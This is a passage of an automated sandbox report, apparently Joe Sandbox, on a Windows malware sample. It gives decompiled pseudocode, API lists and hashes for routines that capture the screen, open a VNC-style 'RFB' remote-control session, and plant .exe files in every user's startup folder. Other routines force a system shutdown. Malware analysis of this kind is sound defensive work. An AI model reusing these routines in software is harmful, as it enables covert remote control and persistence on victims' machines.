GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040688C
GetProcAddress.KERNEL32(?,SelectObject), ref: 00406899
GetProcAddress.KERNEL32(?,BitBlt), ref: 004068A6
GetProcAddress.KERNEL32(?,DeleteObject), ref: 004068B3
GetProcAddress.KERNEL32(?,DeleteDC), ref: 004068C0
LoadImageW.USER32 ref: 00406964
GetIconInfo.USER32(00000000,?), ref: 00406979
GetCursorPos.USER32(?), ref: 00406987
DrawIcon.USER32 ref: 00406A5C
lstrcmpiW.KERNEL32(?,-00000030), ref: 00406ADD
FreeLibrary.KERNEL32(?), ref: 00406BF4
FreeLibrary.KERNEL32(?), ref: 00406BFE
FreeLibrary.KERNEL32(?), ref: 00406C08

Strings

ole32.dll, xrefs: 00406839
GetDeviceCaps, xrefs: 00406881
SelectObject, xrefs: 0040688E
CreateCompatibleDC, xrefs: 00406868
DISPLAY, xrefs: 00406932
CreateCompatibleBitmap, xrefs: 00406874
GdiplusShutdown, xrefs: 004067AA
DeleteDC, xrefs: 004068B5
GdipSaveImageToStream, xrefs: 004067EB
GdipDisposeImage, xrefs: 004067C4
CreateStreamOnHGlobal, xrefs: 00406840
GdipGetImageEncoders, xrefs: 004067DE
GdipCreateBitmapFromHBITMAP, xrefs: 004067B7
GdipGetImageEncodersSize, xrefs: 004067D1
gdiplus.dll, xrefs: 00406779
gdi32.dll, xrefs: 00406856
CreateDCW, xrefs: 0040685D
BitBlt, xrefs: 0040689B
DeleteObject, xrefs: 004068A8
GdiplusStartup, xrefs: 0040679F

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
API String ID: 1554524784-1167942225
Opcode ID: ff763bebfe5368e45d872b18aeaac138f5585063f0fd75a427a3c9bf2c45a71a
Instruction ID: 05bc632263542a7a1e1f70fa48b94c57faca9150cc34a2dde216bdf661849e2f
Opcode Fuzzy Hash: ff763bebfe5368e45d872b18aeaac138f5585063f0fd75a427a3c9bf2c45a71a
Instruction Fuzzy Hash: 01E1E6B1D00269ABCF209FE5CD849AEBFB9BF08305F15447BE506B6290D778AA50CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041A5E9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 240
synchronizationsleepshutdownCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E0041A5E9(void* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v536;
				char _v540;
				char _v544;
				char _v644;
				signed char _v648;
				char _v748;
				short _v760;
				short _v772;
				char _v776;
				intOrPtr _v780;
				void _v784;
				void _v785;
				void* _v788;
				char _v789;
				int _v792;
				void _v793;
				void* _v796;
				char _v797;
				void* _v800;
				char _v801;
				void* _v804;
				char _v813;
				int _v817;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t73;
				int _t78;
				intOrPtr* _t79;
				int _t81;
				void* _t83;
				int _t87;
				void* _t91;
				int _t99;
				int _t107;
				void _t128;
				void* _t142;
				void* _t144;

				_t133 = __ecx;
				_t146 =  &_v776;
				_v785 = 0;
				if(E0040D910(0, __ecx,  &_v776,  *0x4218c4) != 0) {
					_v784 = _v772;
					_t128 = E0041A22D( &_v784, __ecx, _v776);
					_v784 = _t128;
					if(_t128 == 0) {
						_v784 = 0;
					}
					_t70 = E0040D9B8( &_v776);
				}
				if(_v784 != 0x1e6) {
					__eflags = _v784 - 0xc;
					if(__eflags != 0) {
						goto L41;
					}
					_t73 = E00419DD8(_t133, __eflags, 0x8789347b, 2);
					_v792 = _t73;
					__eflags = _t73;
					if(_t73 == 0) {
						L39:
						__eflags = _a8 - 1;
						if(_a8 == 1) {
							E0040A0F9(0, _t146,  *0x4218c4);
						}
						goto L41;
					}
					E00419DA0(0x19367400,  &_v748, 1);
					_t78 = E0040BE88( &_v760);
					_t146 = GetFileAttributesExW;
					__eflags = _t78;
					if(_t78 == 0) {
						L23:
						_t79 =  *0x42186c;
						__imp__IsWellKnownSid( *_t79, 0x16);
						__eflags = _t79 - 1;
						if(__eflags != 0) {
							_v793 = 0;
							_t81 = ReadProcessMemory(0xffffffff, _t146,  &_v793, 1, 0);
							__eflags = _t81;
							if(_t81 == 0) {
								L29:
								_push( *((intOrPtr*)(_v788 + 8)));
								_t83 = E0040EB5A(_t133, E00413F59,  *((intOrPtr*)(_v788 + 4)));
								_t146 = 0x4218c8;
								_v801 = E00413F59(_t83,  &_v540, E00413F59, 0x4218c8);
								L30:
								__eflags = _v797 - 1;
								if(_v797 == 1) {
									_t87 = E00409F5D( &_v536, 0, _t146, 0,  &_v776);
									__eflags = _t87;
									_v817 = _t87 != 0;
									__eflags = _v817;
									if(_v817 != 0) {
										E00419DA0(0x2a43533f,  &_v760, 1);
										_t91 = CreateEventW(0x4218a0, 1, 0,  &_v772);
										_t142 = _v788;
										_v800 = _t91;
										_v796 = _t142;
										_push(0xffffffff);
										__eflags = _t91;
										if(_t91 != 0) {
											WaitForMultipleObjects(2,  &_v788, 0, ??);
										} else {
											WaitForSingleObject(_t142, ??);
										}
										_t146 = CloseHandle;
										__eflags = _v788;
										if(_v788 != 0) {
											CloseHandle(_v788);
										}
										CloseHandle(_v772);
										CloseHandle(_t142);
									}
								}
								L38:
								E0040BE5B(_v796);
								goto L39;
							}
							__eflags = _v793 - 0xe9;
							if(_v793 != 0xe9) {
								goto L29;
							}
							_t99 = GetFileAttributesExW(0x421cd6, 0x78f16360,  &_v784);
							__eflags = _t99 - 1;
							if(_t99 != 1) {
								goto L29;
							}
							_push( *((intOrPtr*)(_v792 + 8)));
							E0040EB5A(_t133, E004142C5,  *_v792);
							_push(_a4);
							_t146 = 0x4218c8;
							_push( &_v544);
							_v813 = E004142C5( &_v544, 0x4218c8, E004142C5, 0x4218c8);
							VirtualFree(_v804, 0, 0x8000);
							goto L30;
						}
						_v793 = E00414625(__eflags);
						goto L38;
					} else {
						goto L20;
					}
					while(1) {
						L20:
						_v785 = 0;
						_t107 = ReadProcessMemory(0xffffffff, _t146,  &_v785, 1, 0);
						__eflags = _t107;
						if(_t107 == 0) {
							goto L22;
						}
						__eflags = _v785 - 0xe9;
						if(_v785 == 0xe9) {
							goto L23;
						}
						L22:
						Sleep(0x1f4);
					}
				} else {
					if(E0041420E(_t70, _t133, _v780) != 0) {
						E00419DA0(0x38901130,  &_v748, 1);
						if(CreateMutexW(0x4218a0, 1,  &_v760) == 0) {
							_v784 = 0;
						} else {
							_v784 = E0040BE6B(_t112);
						}
						if(_v784 != 0) {
							E004192F3(_t133,  &_v644);
							if((_v648 & 0x00000020) != 0) {
								 *0x421868 =  *0x421868 | 0x00000010;
							}
							E004051BF();
							if(( *0x421868 & 0x00000010) != 0) {
								ExitWindowsEx(0x14, 0x80000000);
							}
							E00419DA0(0x2a43533f,  &_v748, 1);
							_t144 = OpenEventW(2, 0,  &_v760);
							if(_t144 != 0) {
								SetEvent(_t144);
								CloseHandle(_t144);
							}
							E0041A2EA(1);
							_v789 = 1;
							CloseHandle(_v788);
						}
					}
					L41:
					E0040868F(_v780);
					return _v789;
				}
			}

0x0041a5e9
0x0041a602
0x0041a606
0x0041a611
0x0041a61b
0x0041a623
0x0041a628
0x0041a62e
0x0041a630
0x0041a630
0x0041a638
0x0041a638
0x0041a645
0x0041a721
0x0041a726
0x00000000
0x00000000
0x0041a733
0x0041a738
0x0041a73c
0x0041a73e
0x0041a8f9
0x0041a8f9
0x0041a8fd
0x0041a905
0x0041a905
0x00000000
0x0041a8fd
0x0041a750
0x0041a75a
0x0041a75f
0x0041a76b
0x0041a76d
0x0041a798
0x0041a798
0x0041a7a1
0x0041a7a7
0x0041a7aa
0x0041a7c5
0x0041a7c9
0x0041a7cb
0x0041a7cd
0x0041a830
0x0041a834
0x0041a83f
0x0041a844
0x0041a857
0x0041a85b
0x0041a85b
0x0041a860
0x0041a876
0x0041a87b
0x0041a87d
0x0041a882
0x0041a886
0x0041a894
0x0041a8a6
0x0041a8ac
0x0041a8b0
0x0041a8b4
0x0041a8b8
0x0041a8ba
0x0041a8bc
0x0041a8cf
0x0041a8be
0x0041a8bf
0x0041a8bf
0x0041a8d5
0x0041a8db
0x0041a8df
0x0041a8e5
0x0041a8e5
0x0041a8eb
0x0041a8ee
0x0041a8ee
0x0041a886
0x0041a8f0
0x0041a8f4
0x00000000
0x0041a8f4
0x0041a7cf
0x0041a7d4
0x00000000
0x00000000
0x0041a7e5
0x0041a7e7
0x0041a7ea
0x00000000
0x00000000
0x0041a7f0
0x0041a7fa
0x0041a7ff
0x0041a80d
0x0041a812
0x0041a824
0x0041a828
0x00000000
0x0041a828
0x0041a7b1
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a76f
0x0041a76f
0x0041a77a
0x0041a77e
0x0041a780
0x0041a782
0x00000000
0x00000000
0x0041a784
0x0041a789
0x00000000
0x00000000
0x0041a78b
0x0041a790
0x0041a790
0x0041a64b
0x0041a656
0x0041a668
0x0041a681
0x0041a68e
0x0041a683
0x0041a688
0x0041a688
0x0041a696
0x0041a6a4
0x0041a6b1
0x0041a6b3
0x0041a6b3
0x0041a6ba
0x0041a6c6
0x0041a6cf
0x0041a6cf
0x0041a6e1
0x0041a6fa
0x0041a6fe
0x0041a701
0x0041a708
0x0041a708
0x0041a70c
0x0041a715
0x0041a71a
0x0041a71a
0x0041a696
0x0041a90a
0x0041a90e
0x0041a91d
0x0041a91d

APIs

Part of subcall function 0040D910: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 0040D935
Part of subcall function 0040D910: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,00000003,00000000,00000000), ref: 0040D948

CreateMutexW.KERNEL32(004218A0,00000001,?,38901130,?,00000001), ref: 0041A679
ExitWindowsEx.USER32(00000014,80000000), ref: 0041A6CF
OpenEventW.KERNEL32(00000002,00000000,?,2A43533F,?,00000001), ref: 0041A6EE
SetEvent.KERNEL32(00000000), ref: 0041A701
CloseHandle.KERNEL32(00000000), ref: 0041A708
CloseHandle.KERNEL32(000001E6), ref: 0041A71A
ReadProcessMemory.KERNEL32(000000FF,76DDF9B0,00000002,00000001,00000000,?,19367400,?,00000001,8789347B,00000002), ref: 0041A77E
Sleep.KERNEL32(000001F4), ref: 0041A790
IsWellKnownSid.ADVAPI32(?,00000016,?,19367400,?,00000001,8789347B,00000002), ref: 0041A7A1
ReadProcessMemory.KERNEL32(000000FF,76DDF9B0,00000000,00000001,00000000), ref: 0041A7C9
VirtualFree.KERNEL32(?,00000000,00008000,?,?), ref: 0041A828
GetFileAttributesExW.KERNEL32(00421CD6,78F16360,?), ref: 0041A7E5

Part of subcall function 0040EB5A: VirtualProtect.KERNEL32(?,?,00000040,?), ref: 0040EB6F
Part of subcall function 0040EB5A: VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?), ref: 0040EBA2

CreateEventW.KERNEL32(004218A0,00000001,00000000,?,2A43533F,?,00000001,00000001,?,00000000,004218C8,00000000,?), ref: 0041A8A6
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041A8BF
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0041A8CF
CloseHandle.KERNEL32(?), ref: 0041A8E5
CloseHandle.KERNEL32(?), ref: 0041A8EB
CloseHandle.KERNEL32(?), ref: 0041A8EE

Strings

, xrefs: 0041A6A9

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesExitFreeKnownMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
String ID:
API String ID: 3145520045-3916222277
Opcode ID: 77c4faeb6141759cb4f336ef3b50b34b7cc139a6f05c824f3e1fcf375186bc11
Instruction ID: 59379fc6374b4e82b27153267f2812a03bed986fdde62ab12faeae3dfe920ed5
Opcode Fuzzy Hash: 77c4faeb6141759cb4f336ef3b50b34b7cc139a6f05c824f3e1fcf375186bc11
Instruction Fuzzy Hash: 2581F431508345AED710EF60CD84EEF7BE8AF85354F44092EF584A21A1C738C999CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 00414625 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00414625(void* __eflags) {
				char _v5;
				char* _v12;
				char _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				char _v88;
				char _v608;
				short _v1128;
				char _v1648;
				void* __ebx;
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t63;
				int _t69;
				char _t70;
				char _t76;
				int _t80;
				char _t81;
				char _t82;
				char _t86;
				char _t88;
				WCHAR* _t98;
				int _t99;
				CHAR* _t110;
				char* _t111;
				WCHAR* _t112;
				struct HINSTANCE__* _t113;
				signed int _t114;
				void* _t115;

				_t112 =  &_v56;
				_v5 = 0;
				E00412F05(0xbe, _t112);
				_t113 = LoadLibraryW(_t112);
				if(_t113 == 0) {
					L7:
					return 0;
				} else {
					_t110 =  &_v88;
					E00412ECF(0xbf, _t110);
					_t63 = GetProcAddress(_t113, _t110);
					if(_t63 != 0) {
						_push( &_v12);
						_t106 =  &_v608;
						_push( &_v608);
						_v12 = 0x104;
						if( *_t63() == 1) {
							_t98 =  &_v1128;
							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
							if(_t98 == 0) {
								_t106 =  &_v608;
								_t99 = E00409301(_t106);
								_v12 = _t99;
								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
									_t106 = _t115 + _v12 * 2 - 0x464;
									E00408A32(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
									_v5 = 1;
								}
							}
						}
					}
					FreeLibrary(_t113);
					if(_v5 != 0) {
						_v5 = 0;
						_v28 = 0;
						_t111 = L".exe";
						do {
							_v12 = 0;
							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
							_v24 = _t69;
							__eflags = _t69;
							if(_t69 == 0) {
								L11:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L24;
								}
								_t114 = 0;
								__eflags = _v20;
								if(_v20 <= 0) {
									L23:
									NetApiBufferFree(_v12);
									goto L24;
								} else {
									goto L13;
								}
								do {
									L13:
									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
									__eflags = _t80;
									if(_t80 == 0) {
										_t81 = _v16;
										__eflags = _t81;
										if(_t81 != 0) {
											_t106 =  &_v608;
											_t82 = E00406DFF( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
											__eflags = _t82;
											if(_t82 != 0) {
												_t86 = E0040DFC5( &_v1128,  &_v608,  &_v608);
												__eflags = _t86;
												if(_t86 != 0) {
													_t88 = E0040DD44( &_v608);
													__eflags = _t88;
													if(_t88 != 0) {
														__eflags = E0040CB87(0,  &_v608,  &_v1648, _t111, 6);
														if(__eflags != 0) {
															__eflags = E00413D24( &_v608, __eflags, 0,  &_v1648, 0);
															if(__eflags != 0) {
																_v5 = 1;
																E00413E51(0,  &_v608, _t111, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
															}
														}
													}
												}
											}
											NetApiBufferFree(_v16);
										}
									}
									_t114 = _t114 + 1;
									__eflags = _t114 - _v20;
								} while (_t114 < _v20);
								goto L23;
							}
							__eflags = _t69 - 0xea;
							if(_t69 != 0xea) {
								break;
							}
							goto L11;
							L24:
							__eflags = _v24 - 0xea;
						} while (_v24 == 0xea);
						_t70 =  &_v1128;
						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
						__eflags = _t70;
						if(_t70 == 0) {
							__eflags = E0040CB87(0,  &_v1128,  &_v1648, _t111, 6);
							if(__eflags != 0) {
								_t76 = E00413D24(_t106, __eflags, 0,  &_v1648, 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_v5 = 1;
								}
							}
						}
						return _v5;
					}
					goto L7;
				}
			}

0x00414633
0x0041463b
0x0041463e
0x0041464c
0x00414650
0x004146ed
0x00000000
0x00414656
0x00414656
0x0041465e
0x00414667
0x0041466f
0x00414674
0x00414675
0x0041467b
0x0041467c
0x00414688
0x0041468a
0x00414698
0x004146a0
0x004146a2
0x004146a8
0x004146ae
0x004146c3
0x004146c8
0x004146d8
0x004146dd
0x004146dd
0x004146c3
0x004146a0
0x00414688
0x004146e2
0x004146eb
0x004146f4
0x004146f7
0x004146fa
0x004146ff
0x00414715
0x00414718
0x0041471d
0x00414720
0x00414722
0x0041472f
0x0041472f
0x00414732
0x00000000
0x00000000
0x00414738
0x0041473a
0x0041473d
0x004147f7
0x004147fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00414743
0x00414743
0x00414750
0x00414755
0x00414757
0x0041475d
0x00414760
0x00414762
0x00414768
0x00414772
0x00414777
0x00414779
0x00414789
0x0041478e
0x00414790
0x00414799
0x0041479e
0x004147a0
0x004147b9
0x004147bb
0x004147cb
0x004147cd
0x004147dc
0x004147e0
0x004147e0
0x004147cd
0x004147bb
0x004147a0
0x00414790
0x004147e8
0x004147e8
0x00414762
0x004147ed
0x004147ee
0x004147ee
0x00000000
0x00414743
0x00414724
0x00414729
0x00000000
0x00000000
0x00000000
0x004147ff
0x004147ff
0x004147ff
0x0041480c
0x0041481d
0x00414823
0x00414825
0x0041483e
0x00414840
0x0041484b
0x00414850
0x00414852
0x00414854
0x00414854
0x00414852
0x00414840
0x00000000
0x00414858
0x00000000
0x004146eb

APIs

LoadLibraryW.KERNEL32(?), ref: 00414646
GetProcAddress.KERNEL32(00000000,?), ref: 00414667
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00414698
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 004146BB
FreeLibrary.KERNEL32(00000000), ref: 004146E2
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00414718
NetUserGetInfo.NETAPI32(00000000,?,00000017,?,00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00414750
NetApiBufferFree.NETAPI32(?,00000000,?,00000017,?,00000000,00000000,00000002,?,000000FF,?,?,?), ref: 004147E8
NetApiBufferFree.NETAPI32(?,00000000,00000000,00000002,?,000000FF,?,?,?), ref: 004147FA
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?,00000000,00000000,00000002,?,000000FF,?,?,?), ref: 0041481D

Strings

.exe, xrefs: 004146FA, 004147A4, 00414829

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
String ID: .exe
API String ID: 1753652487-4119554291
Opcode ID: d94707ce211606735f8bb37e92aaddbd604fa7aa1f1d0ce89352b517e6e9647e
Instruction ID: 247a51c92802e4a7f7b824722b9fdeb58cec9c9de97fca7913f035238f1bbeed
Opcode Fuzzy Hash: d94707ce211606735f8bb37e92aaddbd604fa7aa1f1d0ce89352b517e6e9647e
Instruction Fuzzy Hash: 30518371900258AEDF20DB94CD85EEFB7BDAB45304F0001AAF555F7182E7399A898B28

Uniqueness

Uniqueness Score: -1.00%

Function 00409FB8 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00409FB8(void* _a4, WCHAR* _a8) {
				WCHAR* _v5;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				struct _PROCESS_INFORMATION _v40;
				struct _STARTUPINFOW _v108;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t31;
				WCHAR* _t49;
				long _t50;
				intOrPtr* _t52;

				_v5 = 0;
				_t28 = LoadLibraryA("userenv.dll");
				_v20 = _t28;
				if(_t28 != 0) {
					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
					_v24 = _t31;
					if(_t52 != 0 && _t31 != 0) {
						_push(0);
						_push(_a4);
						_push( &_v16);
						_v16 = 0;
						if( *_t52() == 0) {
							_v16 = 0;
						}
						_t50 = 0x44;
						_v12 = 0;
						E00408742( &_v108,  &_v108, 0, _t50);
						_t49 = _a8;
						_v108.cb = _t50;
						_v108.lpDesktop = 0;
						if(_t49 == 0) {
							_t49 =  &_v12;
						}
						asm("sbb eax, eax");
						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
							CloseHandle(_v40.hThread);
							CloseHandle(_v40);
							_v5 = _v40.dwProcessId != 0;
						}
						if(_v16 != 0) {
							_v24(_v16);
						}
					}
					FreeLibrary(_v20);
				}
				return _v5 & 0x000000ff;
			}

0x00409fc6
0x00409fc9
0x00409fcf
0x00409fd4
0x00409ff2
0x00409ff4
0x00409ff6
0x00409ffb
0x0040a009
0x0040a00a
0x0040a010
0x0040a011
0x0040a018
0x0040a01a
0x0040a01a
0x0040a01f
0x0040a023
0x0040a02c
0x0040a031
0x0040a034
0x0040a037
0x0040a03c
0x0040a03e
0x0040a03e
0x0040a050
0x0040a06d
0x0040a078
0x0040a07d
0x0040a082
0x0040a082
0x0040a089
0x0040a08e
0x0040a08e
0x0040a089
0x0040a094
0x0040a09b
0x0040a0a2

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 00409FC9
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00409FE8
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00409FF4
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000044), ref: 0040A065
CloseHandle.KERNEL32(?), ref: 0040A078
CloseHandle.KERNEL32(?), ref: 0040A07D
FreeLibrary.KERNEL32(?), ref: 0040A094

Strings

DestroyEnvironmentBlock, xrefs: 00409FEA
userenv.dll, xrefs: 00409FC1
CreateEnvironmentBlock, xrefs: 00409FE2

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
API String ID: 3080530829-1103369309
Opcode ID: b29342b4ae1ae2a9389abb2da0e05147b21af0c9a3a76a1950d97ced36fa5097
Instruction ID: 36680d1631c62dea557380e87167de5f52ff5984de9038cb26bbc2a971ec911c
Opcode Fuzzy Hash: b29342b4ae1ae2a9389abb2da0e05147b21af0c9a3a76a1950d97ced36fa5097
Instruction Fuzzy Hash: DF2118B2D1021DBFDF119FA5CC849EEBBBCEB08344B10847AE505F21A0D6399E54CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041119E Relevance: 16.4, APIs: 5, Strings: 4, Instructions: 670
synchronizationnetworkCOMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0041119E(void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, signed char _a15, void* _a16) {
				signed int _v8;
				signed int _v13;
				signed short _v15;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v31;
				signed int _v32;
				signed int _v36;
				short _v41;
				short _v43;
				char _v44;
				char _v49;
				char _v52;
				char _v53;
				char _v56;
				char _v60;
				signed int _v64;
				char _v77;
				char _v78;
				unsigned int _v80;
				signed int _v84;
				char _v100;
				signed short _v102;
				signed short _v104;
				signed int _v109;
				char _v112;
				char _v116;
				char _v124;
				char _v380;
				void* __edi;
				void* __esi;
				void* _t204;
				char _t205;
				void* _t207;
				signed char _t211;
				unsigned int _t219;
				signed int _t224;
				signed int _t256;
				signed int _t260;
				signed int _t261;
				void* _t263;
				signed int _t264;
				void* _t273;
				void* _t280;
				signed int _t288;
				signed int _t289;
				void* _t291;
				signed int _t292;
				signed short _t294;
				unsigned int _t295;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				intOrPtr _t303;
				signed int _t307;
				void* _t309;
				signed int _t310;
				signed int _t314;
				signed int _t316;
				signed int _t317;
				void* _t319;
				signed int _t320;
				signed int _t327;
				void* _t329;
				signed int _t330;
				signed int _t331;
				signed char _t333;
				void* _t350;
				signed int _t351;
				void* _t353;
				signed int _t354;
				signed int _t364;
				signed int _t373;
				signed int _t380;
				signed int _t387;
				signed int _t388;
				unsigned int _t423;
				signed char _t439;
				signed char _t441;
				signed char _t443;
				signed int _t449;
				signed int _t458;
				void* _t470;
				signed int _t477;
				signed int _t488;
				signed int _t490;
				signed int _t495;
				char _t504;
				intOrPtr _t505;
				signed int _t506;
				signed short _t508;
				intOrPtr* _t516;
				signed int _t524;
				void* _t525;

				_t505 = _a8;
				_t205 = E0040B66B(_t204, _a4, "RFB 003.003\n", 0xc);
				if(_t205 == 0) {
					L107:
					return _t205;
				}
				_push(0x1b7740);
				_push( &_v60);
				_t207 = 0xc;
				_t205 = E0040B5F4(_t207, _a4);
				if(_t205 == 0) {
					goto L107;
				}
				_push( &_v60);
				_t470 = 4;
				_t205 = E00409315(_t470, "RFB ", _t470);
				if(_t205 != 0) {
					goto L107;
				}
				_v53 = _t205;
				_v49 = _t205;
				_t211 = E00408D25( &_v52, "RFB ", 0);
				_t205 = ((E00408D25( &_v56, "RFB ", 0) & 0x000000ff | (_t211 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
				if(_t205 > 0x300) {
					goto L107;
				} else {
					_v24 = _v24 & 0x00000000;
					_v20 = 1;
					 *((intOrPtr*)(_t505 + 4))( &_v24);
					_t219 = _v20;
					_t477 = (_t219 & 0x0000ff00 | _t219 << 0x00000010) << 8;
					_t397 = (_t219 & 0x00ff0000 | _t219 >> 0x00000010) >> 0x00000008 | _t477;
					_v36 = (_t219 & 0x00ff0000 | _t219 >> 0x00000010) >> 0x00000008 | _t477;
					if(E0040B66B( &_v36, _a4,  &_v36, 4) == 0) {
						_v20 = _v20 | 0xffffffff;
					}
					_t224 = _v20;
					if(_t224 == 0) {
						return E00411138(_t397, __eflags, _a4, _v24);
					}
					_t205 = _t224 - 1;
					if(_t205 != 0) {
						goto L107;
					}
					_t205 = E0040B5F4(1, _a4,  &_v31, 0x1b7740);
					if(_t205 == 0) {
						goto L107;
					}
					_t205 =  *((intOrPtr*)(_t505 + 8))();
					if(_t205 == 0) {
						goto L107;
					}
					_v36 = _v36 & 0x00000000;
					_t205 =  *((intOrPtr*)(_t505 + 0xc))( &_v124);
					_t401 = _t205;
					_t539 = _t205;
					if(_t205 == 0) {
						goto L107;
					}
					_t205 = E00410F72( &_v124, _t401,  &_v36, _t539, _a12);
					_t504 = _t205;
					if(_t504 == 0) {
						goto L107;
					}
					_t506 = E004092EF(_v36);
					_v104 =  *(_t504 + 8) << 0x00000008 |  *(_t504 + 9) & 0x000000ff;
					_v102 =  *(_t504 + 0xa) << 0x00000008 |  *(_t504 + 0xb) & 0x000000ff;
					_v84 = (_t506 & 0x00ff0000 | _t506 >> 0x00000010) >> 0x00000008 | (_t506 << 0x00000010 | _t506 & 0x0000ff00) << 0x00000008;
					_t44 = _t504 + 0x20; // 0x20
					E004086CB( &_v100, _t44, 0x10);
					asm("rol word [ebp-0x5c], 0x8");
					asm("rol word [ebp-0x5a], 0x8");
					asm("rol word [ebp-0x58], 0x8");
					if(E0040B66B( &_v104, _a4,  &_v104, 0x18) == 0 || _t506 > 0 && E0040B66B(_t246, _a4, _v36, _t506) == 0) {
						return E00411105(_t504);
					} else {
						_v41 = 0xffff;
						_v44 = 0;
						_v43 = 0xffff;
						E00408742( &_v380,  &_v380, 0, 0xff);
						E00408742( &_v380,  &_v380, 0, 0xff);
						_v8 = 0;
						_v20 = 0;
						goto L16;
						do {
							while(1) {
								L16:
								_t373 = _v8;
								_t508 = 0;
								if(_t373 <= 0) {
									goto L35;
								}
								L17:
								_t273 = E0040B938(0,  &_a4, 0x12c, 0);
								if(_t273 != 0xffffffff) {
									goto L35;
								}
								__imp__#111();
								if(_t273 != 0x274c) {
									L104:
									E00411105(_t504);
									return E0040868F(_v20);
								}
								if(_a16 != 0) {
									WaitForSingleObject(_a16, 0xffffffff);
								}
